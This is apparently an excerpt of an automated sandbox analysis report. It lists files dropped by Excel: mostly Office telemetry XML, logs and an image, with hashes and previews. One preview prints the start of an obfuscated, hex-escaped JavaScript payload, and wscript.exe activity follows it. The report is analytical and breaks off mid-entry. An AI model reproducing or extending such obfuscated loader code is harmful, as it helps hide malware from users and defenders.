                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1057246
                                                                                                                                                                                          Entropy (8bit):4.641294636754815
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:a6OFbXQvZlV0N8x5thr291gess3TylunXIJSHQX:ZOhXuZlV0N8x5thr291gess3TylunXg
                                                                                                                                                                                          MD5:15EBCB334628D2F2A19CD3A340A48C55
                                                                                                                                                                                          SHA1:A168643E63CBDDF2D7E6184FF58B4563EE4F47B7
                                                                                                                                                                                          SHA-256:72E904E3731A2E116C4E9AD82E75607581FF51B340A29AA50149EE466FD616E0
                                                                                                                                                                                          SHA-512:3AEA3E19ED51DCF690D1C3AC569621EE43556FABF85368BC36F6BCE3156A9F7E988DB713E26DBB3E29E33AF0A573233AE4D596FC672CD7B82116BF54E9462031
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<Rules><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="NE">.. <L>.. <S T="1" F="Warning" />.. </L>.. <R>.. <V V="37" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="1" F="Warning" />.. </L>.. <R>.. <V V="29" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <TI T="3" I="10min" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="RuleID" />.. <F N="RuleVersion" />..
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):520
                                                                                                                                                                                          Entropy (8bit):5.3166935619676075
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5EztrnpYoAQ/nerO8AuUdaGodHMNO2sb:JdaztrqrOHfpUN
                                                                                                                                                                                          MD5:34CCF28EAAB3351113ADEEACA0EB2DCF
                                                                                                                                                                                          SHA1:C30A79EE0C3D721D54389CABFE8B870B3CC5E90D
                                                                                                                                                                                          SHA-256:23E09DDEEDAFF09E05973630E016137E5E10F8989B1BC74F8D683CC1565E2DC4
                                                                                                                                                                                          SHA-512:36B8A4BD4E2FB68DDBAA19B1823E0AFA8F614E3014E029C5A16322A5EC94CCEB834E4708BC5EF6D0131496973536001A9033FF6013F483D1DEF0454BFDDBA671
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324001" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryProjectLoad" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097w" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):868
                                                                                                                                                                                          Entropy (8bit):5.119534354066693
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd55vzZOnpYoAQ/nerOYuUdaGodHMp9SufJSx4moXDsnHDhFIyF3wX2MNO2sb:JdvzZOqrOYfpUWw9oTeVBAA
                                                                                                                                                                                          MD5:359BC53C7F7B10391422044A067A4F59
                                                                                                                                                                                          SHA1:30960D6DD6F62FA0D573CF09304325CE407F9685
                                                                                                                                                                                          SHA-256:DA47FA1EA559BE3AA505158D848D51679E70B27EAF6CC7B9DFA8C259484D4C60
                                                                                                                                                                                          SHA-512:D88D0CD409191743A8ED0C7E294A7E373A5BA286B5C4CE083C6489B8B1C2398C244BD147BFF47C75A308D5805630227B0F91343D23A149C1427DF4E1EBBC4897
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324002" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryDeclare" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097x" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="true" N="HashDeclare">.. <S T="1" F="HashDeclare" />.. </C>.. <C T="U32" I="3" O="true" N="HashEntryPoint">.. <S T="1" F="HashEntryPoint" />.. </C>.. <C T="B" I="4" O="false" N="IsPtrSafe">.. <S T="1" F="IsPtrSafe" />.. </C>.. <C T="U32" I="5" O="false" N="DeclareCount">.. <S T="1" F="DeclareCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):751
                                                                                                                                                                                          Entropy (8bit):5.233120305587472
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5WztetnpYoAQ/nerOp7uUdaGodHMp9VJYGJ9yVeacX6eabMNO2sb:JdozctqrOp7fpU059/1vg
                                                                                                                                                                                          MD5:E25A230FBF8EE2E6AD1D380658573318
                                                                                                                                                                                          SHA1:69F0DC438434665BD334A66603521B2266AF139E
                                                                                                                                                                                          SHA-256:C2C1B764095B9581E01DE40B3721D189B6A2518CF76CB00D3A13B65965B4E3A2
                                                                                                                                                                                          SHA-512:2AF95C8359BDDDC079579FCC9CE327C45DCBC47F6E66419FFD17621B39B022828FC79C94ABE0BD693FB4EE3C7DCEC62D977451F5C503577E22FCB3F36B346795
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324003" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryReferencedLibrary" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097y" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="true" N="HashReferenceLibraryClsid">.. <S T="1" F="HashReferenceLibraryClsid" />.. </C>.. <C T="U32" I="3" O="false" N="ReferencedLibraryCount">.. <S T="1" F="ReferencedLibraryCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):606
                                                                                                                                                                                          Entropy (8bit):5.249872636263215
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5ID+enpYoAQ/nerOVHSuUdaGodHMpEXBMNO2sb:JdCVqrOVyfpUT7
                                                                                                                                                                                          MD5:4D44CDFA8D3760FD3A0E4A961CE68D9C
                                                                                                                                                                                          SHA1:6F17800D5C1F891988E73F732DFE1800C0241C13
                                                                                                                                                                                          SHA-256:F87A38453F8249AD1A8B05927E9F6C0971136A911D8E35CC2884448E6F57A9D4
                                                                                                                                                                                          SHA-512:89D0376B8E16E2E7D103D987752E40B30A2D866DD748828FE28E57B1392DD10D289021D1C2BA5717817761089831E786B0350F7F566427F4C34A632045F0013B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324005" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryCompile" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0970" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="CompileCount">.. <S T="1" F="CompileCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):606
                                                                                                                                                                                          Entropy (8bit):5.259493365234479
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd59g4oTxsnpYoAQ/nerOZuUdaGodHMpeXnMNO2sb:JdjdsxsqrOZfpUVd
                                                                                                                                                                                          MD5:85AD5E7A28B31B61C42678CCDD3A9DE7
                                                                                                                                                                                          SHA1:EA2436ECF8019EBFEC51157C70A060229480ACDB
                                                                                                                                                                                          SHA-256:0F0E887B96E69D7F2A5FC8457ED6F5C27A2AAB07311066D7E03E861E448E3564
                                                                                                                                                                                          SHA-512:D1AA3041B59BB0EF7503CA5349F4DD9C7503E5AFFD4DBD965F0431572CB5A2747BE432AC4D7D9750420D85337F10722BBD0F252E34B4B08B5930F798A8A53B25
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324006" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryShowIde" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0971" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="ShowIdeCount">.. <S T="1" F="ShowIdeCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):618
                                                                                                                                                                                          Entropy (8bit):5.2705840571266815
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5eZkEnpYoAQ/nerOiuUdaGodHMpfBrOXIMrlMNO2sb:JdcZfqrOifpU+pOH3
                                                                                                                                                                                          MD5:361C47A1C07E57D7B96BFB1B7C56281B
                                                                                                                                                                                          SHA1:B9E141222B4F58E6E7408BEE01C5CD531683D6B0
                                                                                                                                                                                          SHA-256:12A1E46EB4C05A9997AD417907F9D6AF7F09C6EEF2200031D82372298F9727B1
                                                                                                                                                                                          SHA-512:581C79AACFCDC0D091A198E50CF7D321D91B36EBA1C560CC3DEA11068BFB97DDF22B5866FE7EEF7EDF980824A774FED27FFA0F67A0F01DE5AAC393BB516294E9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324007" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryIdeMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0972" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="IdeMacroRunCount">.. <S T="1" F="IdeMacroRunCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):614
                                                                                                                                                                                          Entropy (8bit):5.281743398332582
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5JTnpYoAQjerOgAuUdaGodHMpFzOXDzlMNO2sb:JdbTerODfpUoOP3
                                                                                                                                                                                          MD5:D4DFBCA6C99FD4DC17B72AD71ACB104E
                                                                                                                                                                                          SHA1:C5BE3658E2BCD8090C228A92DB0B12152E46A746
                                                                                                                                                                                          SHA-256:B17584167E5D1060975B286C7B90F3D85C9EE3B4430C1B08874DF4CF647B7511
                                                                                                                                                                                          SHA-512:318FCCC56B9A2BB90227F853F7C3A1E56F750C132A79E84D4D159BCEE3D45E7D1F576D1AD9620E58C310F4A318DAEA470E04D129E5F5BCC8B5C8CE44844DFA20
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324008" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryHostMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0973" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="HostMacroRunCount">.. <S T="1" F="HostMacroRunCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):618
                                                                                                                                                                                          Entropy (8bit):5.264994599295691
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5CX3lPnpYoAQ/nerORHSuUdaGodHMp0RXMBCMNO2sb:JdgX1PqrOhSfpUrce
                                                                                                                                                                                          MD5:48F09F0F2360E8E289CA35A58B21A098
                                                                                                                                                                                          SHA1:75697EA6FEA3A145C0123FFF2A3F22C6846BCE45
                                                                                                                                                                                          SHA-256:61CE07868B44B4910CD1D743B9B31BCB3079DBDD429E748CF3F307E60D4ADCCE
                                                                                                                                                                                          SHA-512:EA335E4AA696452AF331C28071C18E9F144398840E82DEEAEA6CBD7F3702FF7B32DFAB8A438B2152C814642C24815B169D75A5992A9C389D6BD7AB208C8FF87C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324009" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroRecord" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0974" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="MacroRecordCount">.. <S T="1" F="MacroRecordCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):618
                                                                                                                                                                                          Entropy (8bit):5.2447044999466135
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:MMHd5uztcnpYoAQ/nerONuUdaGodHMpOqXMHhMNO2sb:JdMtcqrONfpUbqcHL
                                                                                                                                                                                          MD5:9BC25CC393F30C77F35D341564A1A1EF
                                                                                                                                                                                          SHA1:E0CDF434F3644A0B408FAF70B023F42045F5A8F4
                                                                                                                                                                                          SHA-256:DE03A985844305BD4C2A5CF9247930D349B70967258C0979C00A0E08087784E6
                                                                                                                                                                                          SHA-512:68D716D1E2CC72F199BD63D9216FDF7607EA593016B2FE2E54BF479BD1BF753308C9BCB278243397879F0D8F6235E7EC623B651C0BB7CFEDD3F939BB39653A07
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="324010" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroCreate" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0975" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="MacroCreateCount">.. <S T="1" F="MacroCreateCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2871
                                                                                                                                                                                          Entropy (8bit):4.912556907537187
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:3vqUencI4Yzcud/9WlGeR/0D3Ij0QH0f+QEVYVWjUtsmMU+zC:/qfcWJ3I76+QEVXjUtsmMUUC
                                                                                                                                                                                          MD5:54CEF57B60622B7D8C19057FC8C1C80D
                                                                                                                                                                                          SHA1:AC846ED27C6DEAFEB5E21FF16843EA3ECA992548
                                                                                                                                                                                          SHA-256:89A13FC28C87724877A1176C52F27D2BCBB5E3755CCED488CF5EDA51987EF2F9
                                                                                                                                                                                          SHA-512:E27D322268E18685D34A8D95F791F2FB28A6AC232FBB0D1DD1813638C988424C3F1DC6B67642512C3B13477C41CCE63C7D85FDA7A18423A2FBBB5B739015C6E1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="63067" V="4" DC="SM" EN="Office.Identity.SspiPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="brt55" />.. <UTS T="2" Id="aysrs" A="aysrt" />.. <UTS T="3" Id="brt58" />.. <UTS T="4" Id="brt6b" />.. <UTS T="5" Id="bgm8f" A="bgm8g bgm8h bgm8i" />.. <UTS T="6" Id="a9qwz" A="brt56 brt6a" />.. <UTS T="7" Id="brt59" />.. <US T="8">.. <S T="3" />.. <S T="6" />.. <S T="4" />.. </US>.. <A T="9" E="TelemetryShutdown" />.. <TO T="10" I="10min">.. <S T="1" />.. </TO>.. </S>.. <C T="I32" I="0" O="false" N="AuthScheme">.. <S T="1" F="AuthScheme" />.. </C>.. <C T="B" I="1" O="false" N="Proxy">.. <S T="1" F="Proxy" />.. </C>.. <C T="BIN" I="2" O="true" N="DocumentUrlHash">.. <U T="OneWaySHA1HashToBinary">.. <S T="1" F="DocumentUrl" M="Ignore" />.. </U>..
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):0.03556172285978935
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Gtl8/6fLSE7rZltl8/6fLSE7rE89//Wlkl:GtGiSEZltGiSEE89Xis
                                                                                                                                                                                          MD5:A2EE81AAF217364F8D267C50382021FC
                                                                                                                                                                                          SHA1:D4C5A6410B7AA3A0BF15BC95101255B4C7AF39DC
                                                                                                                                                                                          SHA-256:2F0D1148FEEF56DAC4040F83833A118C6A7116434E4316A67DBE002EA47A8C0D
                                                                                                                                                                                          SHA-512:A02CB6C1CA876CB1CE9904C6D6DF9CB55C02ABA0C3446AA28F600B112DBB58A31AD6D0AFF6140381E96CCD8CC9F79A70CB2F09A2E991807375F21F2A3D124BA6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..-.....................^a&T...2....qG#VX.M...K..-.....................^a&T...2....qG#VX.M...K........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4152
                                                                                                                                                                                          Entropy (8bit):1.385625358276972
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:K+VWcAqtZeY4syJttJxUSo0x9DdN1tDEX4vcImm5RyZkFv4sbf:KQWjqt8VtbDBtDi4kZERDf
                                                                                                                                                                                          MD5:C231804702277584E34BD2F2157C7A20
                                                                                                                                                                                          SHA1:6EB98D42739DD2A567D2A59989D9CB9DCF541C67
                                                                                                                                                                                          SHA-256:D80D8E02372B4B746859B0FDD2CE3C4573866E452440DA32DB9FEB4A1CF98EBD
                                                                                                                                                                                          SHA-512:C6BC94FA4B8E55AA75AE5D245857B0FB86CF6989D7BEBFF073D78F0726AA7A1B6919C8167D501DE8459B10CF067A08FABFC27AE5F1E0FF2546767DD8909040F1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:7....-..............qG#....................qG#T&a^2..SQLite format 3......@ .......................................................................... ..........#.....g............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 393 x 267, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5981
                                                                                                                                                                                          Entropy (8bit):7.820643856715258
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:eM9fGT13bOcoYSgc4k/5WvdrFes1ufUjY8R4NJoDBpS8VS6BS9k1M807dGcaQa:eM9fGJ3bOcoYZPkMlrFeVcjY8wCxNS+9
                                                                                                                                                                                          MD5:8DA17ADD3FF7EDA3BE7E01ECC7FD8678
                                                                                                                                                                                          SHA1:2DFE55247C17AFD8B8EEF857FA0581BD3249FA7E
                                                                                                                                                                                          SHA-256:60FA0C629F3EDF69475BA24CA39D2B47FFA74E2B0E90582BF54CB032B8B2A8EB
                                                                                                                                                                                          SHA-512:82845F99B7EE41A8B2475AB72B3E3C51A10D066434CA4E28BF1F62D32E78C38733A5E35AF772054050005B05E265320854D1E7B24A515E6A29B069AA52B4F05C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR.............,.zn....pHYs...........~.....IDATx...{.T.....jS%...UJ$...j"`z..l...`.....q..[.F.P0....K.. .I.....5....D..H.a2..$...2.k.........w..9mp..s.sN..~...`.syOO?.^.y...............................................................................HQ.H.t67EDL.'".Ed....eNs@D.._..H..{..e?o.42B.u-....)-.W..D$g..;Z.x.....;.ln.....y....fZ..EdG..e;..$.!.....L..".Y.v%..zPD6.;Z.y'!....;....8.,"k..$.!.Xr[.....zBX Q...J:...C.[..lp.b ...FH 6..."7 ........|G.f.e.W.."...Y...53m..Z..G)....Ng=.........t.u..@d.........R.9v...........N.j.;VA..b..@...t.....3.....;B..! ..@.......@......(..@l1..a.F@.4.# v..X....H.=.Aiu....B....h.i..X......I...../.v....wq.(.M1..eO.4..O.l*b..\.........]9...hU.....C..Ah...........>z.=..lcIQ.yK.#.63.......!.@E...."?."H.!...t;!j......:C..d...8.....k......~.O......=.1..6Dy.....n....l..h....X...8.~..&.0.c....Ma...oAH .n+..L.....P..Jq.....f.8.@..nB ...!.!.9..8.W.[..y....$K..J.%...%H.6 d.U..ie.8.........K.......=V[c....(.../.P
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3326192
                                                                                                                                                                                          Entropy (8bit):3.375091916248702
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:MJXTvo+OB3lANZA8RK2nOn+wAdpDF7Pbz4Mrx3ISs0rdq1BK1UNK1Uuz3JtM5vLq:u
                                                                                                                                                                                          MD5:72DD1D629624DC1C611DAB1BC11FBC0C
                                                                                                                                                                                          SHA1:193E4845FC02CFF99156DC3EC305C0D5392CF135
                                                                                                                                                                                          SHA-256:C5E5490301038F502C446940A1B30C993A24535678D10DF2F1300C50A41188BE
                                                                                                                                                                                          SHA-512:FBF0903B2FBE4F8C62F155E441BAB037061E63B239D3635E9F3C4313F06DC928EAB145FC55C5971BF2ECA427636FA6660D182535CDF49484BBE6DAD3221D03E9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:try{var ZTVHDHOKAKY = ."\x49\x48\x5A\x68\x63\x69\x42\x4E\x56\x31\x42\x59\x52\x5?52\x53\x54\x56\x56\x4E\x50\x56\x73\x69\x49\x69\x77\x69\x4B\x6B\x70\x4E\x49\x57\x5A\x49\x5A\x54\x59\x74\x66\x6C\x6F\x70\x64\x48\x6C\x26\x50\x23\x4A\x6B\x58\x6A\x42\x6F\x4A\x57\x64\x4D\x64\x5?73\x60\x50\x5?6B\x79\x51\x56\x77\x69\x4C\x46\x78\x63\x56\x48\x67\x6A\x4A\x69\x41\x31\x4F\x6D\x74\x69\x4F\x32\x39\x6A\x57\x33\x4A\x56\x52\x48\x4E\x54\x54\x32\x6F\x34\x59\x46\x42\x37\x56\x32\x4?78\x4A\x43\x60\x44\x4C\x7A\x34\x26\x52\x6B\x5?33\x52\x33\x31\x36\x56\x6C\x46\x70\x62\x69\x74\x66\x4D\x33\x42\x33\x4B\x4?42\x53\x54\x6D\x23\x6E\x62\x48\x46\x5A\x64\x6C\x67\x23\x58\x53\x49\x73\x49\x6E\x4A\x56\x49\x7A\x6C\x72\x62\x79\x5?2F\x54\x69\x74\x6F\x4A\x33\x68\x44\x4C\x23\x64\x59\x5A\x7A\x73\x7A\x4C\x56\x41\x32\x56\x4?6C\x46\x5A\x57\x4E\x61\x4F\x69\x6F\x39\x5A\x48\x64\x54\x61\x5?51\x2B\x54\x48\x6C\x49\x4F\x46\x77\x69\x4E\x33\x56\x68\x58\x46\x78\x73\x52\x6A\x51\x26\x63\x57\x34\x77\x49\x4?6F\x6D\x66\x46\x46\x41\x66\x6B\x23\x78\x5
                                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):271
                                                                                                                                                                                          Entropy (8bit):4.911955016250718
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:0wcca95PXr5c//fOgwppH4y4W1CRW35jY:+Ti/Xby4WV5k
                                                                                                                                                                                          MD5:03B0065922C120E0514CE8EAFAF2DD91
                                                                                                                                                                                          SHA1:C6CDC624F0D8F1580387AAE98C91590F90DCFF42
                                                                                                                                                                                          SHA-256:F6AC61283D6AF374821F960C9A06C4C1AF8EE2FF9E94589E0C6E1F2EE0CBD6EF
